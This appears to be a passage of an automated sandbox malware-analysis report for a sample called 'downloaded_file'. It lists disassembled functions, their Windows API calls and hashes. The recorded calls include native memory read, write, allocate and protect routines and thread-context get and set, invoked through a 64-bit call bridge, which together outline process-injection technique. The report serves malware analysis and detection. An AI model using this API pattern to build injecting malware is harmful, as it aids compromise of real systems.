                                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 938513278-0
                                                                                                            • Opcode ID: 1b71fcbfe0ff60b11d2f02de01f67e0bf9080bb5a22d89f10ec9d77506c7d85b
                                                                                                            • Instruction ID: 7bf9660fa40f93be5593d306d2dd12c60c5fc292deea2838d11c2d157d18b839
                                                                                                            • Opcode Fuzzy Hash: 1b71fcbfe0ff60b11d2f02de01f67e0bf9080bb5a22d89f10ec9d77506c7d85b
                                                                                                            • Instruction Fuzzy Hash: 6CF0B432905734DADB33FB78B80774D73A0BF00B21F12410AF544AF2E2CB2469518A97
                                                                                                            Function 0031C970 Relevance: 7.5, APIs: 5, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CoInitialize.OLE32(00000000), ref: 0031C978
                                                                                                            • CoCreateGuid.COMBASE(?), ref: 0031C982
                                                                                                            • StringFromGUID2.COMBASE(?,?,00000027), ref: 0031C996
                                                                                                            • CoUninitialize.COMBASE ref: 0031C9A0
                                                                                                            • CoUninitialize.COMBASE ref: 0031C9AD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Uninitialize$CreateFromGuidInitializeString
                                                                                                            • String ID:
                                                                                                            • API String ID: 46189592-0
                                                                                                            • Opcode ID: 5cd67f4c8775734f537b20d538af4584ab2fb576d93195c962911de6ffe137ca
                                                                                                            • Instruction ID: b968780d18cde3a395e7e30d05dfaf40f6597cb76ca2021a948f31f0c36124fb
                                                                                                            • Opcode Fuzzy Hash: 5cd67f4c8775734f537b20d538af4584ab2fb576d93195c962911de6ffe137ca
                                                                                                            • Instruction Fuzzy Hash: 3DE092313542099BD752AFB4ED0DFAA37BCAF0C701F405418F909C6150E772E480CB52
                                                                                                            Function 00321160 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321534
                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 0032154E
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321558
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321568
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321572
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$MutexRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 2279609368-0
                                                                                                            • Opcode ID: 5e9a16cf408363ca57efa59102c29214a867436db4b1ae8a1479bc8c8943dbaa
                                                                                                            • Instruction ID: 46746f711cc4c4e61883be6e2778b3c6a9146999bf74d680c36971c6b2c39058
                                                                                                            • Opcode Fuzzy Hash: 5e9a16cf408363ca57efa59102c29214a867436db4b1ae8a1479bc8c8943dbaa
                                                                                                            • Instruction Fuzzy Hash: 46F01C75900204EBC72ADFA4E98CB6EB779FB88301F608588E506A2260C739D984CF50
                                                                                                            Function 003064B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetProcAddress64.DOWNLOADED_FILE(00000000,?,NtReadVirtualMemory), ref: 003064D4
                                                                                                            • X64Call.DOWNLOADED_FILE(00000000,00000000,00000005,?,?,?,?,00000000,00000000,?,00000000,?,00000000), ref: 00306554
                                                                                                            • SetLastErrorFromX64Call.DOWNLOADED_FILE(00000000,?), ref: 00306576
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                                                            • String ID: NtReadVirtualMemory
                                                                                                            • API String ID: 3570319994-2166501906
                                                                                                            • Opcode ID: 06abd8a9d6c43b0d5136f3d6d757593f2a6595c98acaff8ea6370585e28ee69f
                                                                                                            • Instruction ID: 15efc77c7e6cd5025b8cb3059d0acd5109414102d6f02560ca9922bbd9c68a10
                                                                                                            • Opcode Fuzzy Hash: 06abd8a9d6c43b0d5136f3d6d757593f2a6595c98acaff8ea6370585e28ee69f
                                                                                                            • Instruction Fuzzy Hash: 96310CB0911209EFEF16CF58DC56BAB77B8AB48704F108429F805A72D8E7749990CF61
                                                                                                            Function 003065A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetProcAddress64.DOWNLOADED_FILE(00000000,?,NtWriteVirtualMemory), ref: 003065C4
                                                                                                            • X64Call.DOWNLOADED_FILE(00000000,00000000,00000005,?,?,?,?,00000000,00000000,?,00000000,?,00000000), ref: 00306644
                                                                                                            • SetLastErrorFromX64Call.DOWNLOADED_FILE(00000000,?), ref: 00306666
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                                                            • String ID: NtWriteVirtualMemory
                                                                                                            • API String ID: 3570319994-3834091833
                                                                                                            • Opcode ID: d8e168a2e062b80b3e9a05da7ed9dbd2ac79900ad19070cf05917d6b581f986f
                                                                                                            • Instruction ID: e18856b3039ec413bb9c6b0b30e170901e8d87c19fd037f1d91219d8a9a8182b
                                                                                                            • Opcode Fuzzy Hash: d8e168a2e062b80b3e9a05da7ed9dbd2ac79900ad19070cf05917d6b581f986f
                                                                                                            • Instruction Fuzzy Hash: 64316FB0911209EFDB16CF68DC66BBB77B8AB48304F11812EF80597394E7359A90CF60
                                                                                                            Function 00306230 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetProcAddress64.DOWNLOADED_FILE(00000000,?,NtAllocateVirtualMemory), ref: 00306254
                                                                                                            • X64Call.DOWNLOADED_FILE(00000000,00000000,00000006,?,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000), ref: 003062CE
                                                                                                            • SetLastErrorFromX64Call.DOWNLOADED_FILE(00000000,?), ref: 003062F0
                                                                                                            Strings
                                                                                                            • NtAllocateVirtualMemory, xrefs: 00306248
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                                                            • String ID: NtAllocateVirtualMemory
                                                                                                            • API String ID: 3570319994-3765841899
                                                                                                            • Opcode ID: 58528c1385be43ab807cb44e8aad1aee6ec638b477d21d04ea451d6b11102804
                                                                                                            • Instruction ID: 4470acc6d402ced8aad8bdac5a4f6f21b837513fc1d9e8759480708ebf834c9a
                                                                                                            • Opcode Fuzzy Hash: 58528c1385be43ab807cb44e8aad1aee6ec638b477d21d04ea451d6b11102804
                                                                                                            • Instruction Fuzzy Hash: A4212CB4D11208EFEB15CFA4EC56BBB77B9EB88300F109529F40897295E7745A948B90
                                                                                                            Function 003063E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetProcAddress64.DOWNLOADED_FILE(00000000,?,NtProtectVirtualMemory), ref: 00306404
                                                                                                            • X64Call.DOWNLOADED_FILE(00000000,00000000,00000005,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00306475
                                                                                                            • SetLastErrorFromX64Call.DOWNLOADED_FILE(00000000,?), ref: 00306497
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                                                            • String ID: NtProtectVirtualMemory
                                                                                                            • API String ID: 3570319994-1546459799
                                                                                                            • Opcode ID: 5acb141a5a08c3eb129c49ffbe26450594579b14ab9578c283776b1145210617
                                                                                                            • Instruction ID: 8860722dfdd5f8d27922455a693c91f9982134c0b70dff73764ebd586ff38a44
                                                                                                            • Opcode Fuzzy Hash: 5acb141a5a08c3eb129c49ffbe26450594579b14ab9578c283776b1145210617
                                                                                                            • Instruction Fuzzy Hash: 7D212AB0D11209AFDF15CF65EC66BBB77F8EB88700F40952DF409A6294D7705990CB64
                                                                                                            Function 00306310 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetProcAddress64.DOWNLOADED_FILE(00000000,?,NtFreeVirtualMemory), ref: 00306334
                                                                                                            • X64Call.DOWNLOADED_FILE(00000000,00000000,00000004,?,?,?,00000000,?,00000000,?,00000000), ref: 0030639F
                                                                                                            • SetLastErrorFromX64Call.DOWNLOADED_FILE(00000000,?), ref: 003063C1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                                                            • String ID: NtFreeVirtualMemory
                                                                                                            • API String ID: 3570319994-3923168862
                                                                                                            • Opcode ID: e62443520159deeea680b8794861d4cda0455566e4a412de28b066999c4e1c2b
                                                                                                            • Instruction ID: 7125efb014c3d168728c33fd91eabb82eaa7a9172bc6fdf3efc46aac9bd175d6
                                                                                                            • Opcode Fuzzy Hash: e62443520159deeea680b8794861d4cda0455566e4a412de28b066999c4e1c2b
                                                                                                            • Instruction Fuzzy Hash: C32179B4D10208EFDB16CF64EC62BBA73B9EB88300F00946DF408972A5E2705990CFE0
                                                                                                            Function 00306160 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetProcAddress64.DOWNLOADED_FILE(00000000,?,NtQueryVirtualMemory), ref: 00306184
                                                                                                            • X64Call.DOWNLOADED_FILE(00000000,00000000,00000006,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003061F1
                                                                                                            • SetLastErrorFromX64Call.DOWNLOADED_FILE(00000000,?), ref: 00306213
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                                                            • String ID: NtQueryVirtualMemory
                                                                                                            • API String ID: 3570319994-66515852
                                                                                                            • Opcode ID: d6712164fcf818735b870b53cc19dfd05892f8844bb22de8c10442b0a0211264
                                                                                                            • Instruction ID: 3089e2fc2de1a07681e4c292d694ae54cd3b9155e1293883592a37f10d223977
                                                                                                            • Opcode Fuzzy Hash: d6712164fcf818735b870b53cc19dfd05892f8844bb22de8c10442b0a0211264
                                                                                                            • Instruction Fuzzy Hash: 4C214DB0D14208AFEB25CF98EC56BBB73BCEB84700F00841CF8089A295D7755A90CF61
                                                                                                            Function 00306690 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetProcAddress64.DOWNLOADED_FILE(00000000,?,NtGetContextThread), ref: 003066B4
                                                                                                            • X64Call.DOWNLOADED_FILE(00000000,00000000,00000002,?,?,?,00000000), ref: 003066F9
                                                                                                            • SetLastErrorFromX64Call.DOWNLOADED_FILE(00000000,?), ref: 0030671B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                                                            • String ID: NtGetContextThread
                                                                                                            • API String ID: 3570319994-3545450881
                                                                                                            • Opcode ID: deea9cb023e923c3f4f011cc4e15baac777ef6b1c00b961751f3a03193edd141
                                                                                                            • Instruction ID: 56279905d559c97c12e14c6618d5275ff62e698dc35bf642352610dcd389c848
                                                                                                            • Opcode Fuzzy Hash: deea9cb023e923c3f4f011cc4e15baac777ef6b1c00b961751f3a03193edd141
                                                                                                            • Instruction Fuzzy Hash: B11182B4D11208EFEB22DF74EC57B6A77BCA744714F10902EF809962D5E27159E08F20
                                                                                                            Function 00306740 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetProcAddress64.DOWNLOADED_FILE(00000000,?,NtSetContextThread), ref: 00306764
                                                                                                            • X64Call.DOWNLOADED_FILE(00000000,00000000,00000002,?,?,?,00000000), ref: 003067A9
                                                                                                            • SetLastErrorFromX64Call.DOWNLOADED_FILE(00000000,?), ref: 003067CB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                                                            • String ID: NtSetContextThread
                                                                                                            • API String ID: 3570319994-3779410840
                                                                                                            • Opcode ID: e157c89b1907c6db99017b4d9e76f192d44e4d367b9e2933e65d89c48e719c39
                                                                                                            • Instruction ID: 339283c9c68abf40f5cd3ae56396cbde1631d4a1a219240cbc8c6e1c8b7d169e
                                                                                                            • Opcode Fuzzy Hash: e157c89b1907c6db99017b4d9e76f192d44e4d367b9e2933e65d89c48e719c39
                                                                                                            • Instruction Fuzzy Hash: DF1182B4911208EFDB22DFB4EC67B6A33FCB744B18F10512CF4088A1C5D37059A4ABA0
                                                                                                            Function 0031645E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _wcscat$FreeLocal__snwprintf
                                                                                                            • String ID: '%s'
                                                                                                            • API String ID: 3523142645-2201965518
                                                                                                            • Opcode ID: 678300493cdce78a8cae450357d30386899df96a4b2b9acca1585e235f4a0d24
                                                                                                            • Instruction ID: 239e8b87684eac01ebe2e47a114330ef14c796ba66cf6c2bf2b9fbfa51991862
                                                                                                            • Opcode Fuzzy Hash: 678300493cdce78a8cae450357d30386899df96a4b2b9acca1585e235f4a0d24
                                                                                                            • Instruction Fuzzy Hash: A7115B7094011CEBDB29DB80CCCABECB779AB64304F208298E0196B195D7749FC4CF90
                                                                                                            Function 00304700 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __snwprintf.LIBCMT ref: 0030471F
                                                                                                            • RegGetValueW.ADVAPI32(80000001,?,{108D3252-20F0-4C1B-940D-6ED5366D8FD3},00000008,00000000,?,?), ref: 00304750
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Value__snwprintf
                                                                                                            • String ID: SOFTWARE\%s${108D3252-20F0-4C1B-940D-6ED5366D8FD3}
                                                                                                            • API String ID: 3635966236-2357458413
                                                                                                            • Opcode ID: cc80f95effe6b77020ad761c4b059cbe826ad336f16158d6a27055af0608c005
                                                                                                            • Instruction ID: 40e1d05fc26ec30776c7cc195025623c70c279aa7dff422594473db5f82cebff
                                                                                                            • Opcode Fuzzy Hash: cc80f95effe6b77020ad761c4b059cbe826ad336f16158d6a27055af0608c005
                                                                                                            • Instruction Fuzzy Hash: D5F0AE71A40708BBD721DA95DC46FD67369DB44B01F104195BE0CA61C0F6F09A844BD4
                                                                                                            Function 003101B5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18sleepCOMMON
                                                                                                            Download Yara Rule
